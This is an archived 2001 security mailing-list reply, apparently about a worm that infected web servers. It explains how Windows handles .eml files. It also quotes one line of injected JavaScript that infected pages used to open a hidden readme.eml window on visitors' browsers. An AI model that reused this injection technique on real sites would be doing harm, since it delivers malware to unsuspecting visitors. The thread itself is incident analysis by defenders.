.eml is listed in the Registry as "Microsoft Internet Mail Message" with Content Type = "message/rfc822". On my Windows 2000 system this will result in a program called \WINDOWS\system32\thumbvw.exe being executed using the Apartment threading model. - Jeff > When pages are served up by an infected server, it looks as though > readme.eml is 'attached' to them. The server attempts to get the client to > open them through the following bit of code (from the .dll file): > > <script language="JavaScript">window.open("readme.eml", null, > "resizable=no,top=6000,left=6000")</script> > > According to Slashdot, this causes the file to be automatically opened and > executed by the client. I haven't been able to confirm or deny that (but if > someone can, please do). > > Regards, > Matt > > > -- > Matt Davis, MCP > Intermediate Client Server Business Support Analyst > COUNTRY(SM) Insurance & Financial Services > 309-821-6288 > mailto:matt.davisat_private > Jeffrey Altman * Sr.Software Designer C-Kermit 8.0 Beta available The Kermit Project @ Columbia University includes Secure Telnet and FTP http://www.kermit-project.org/ using Kerberos, SRP, and kermit-support@kermit-project.org OpenSSL. SSH soon to follow. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 18:15:49 PDT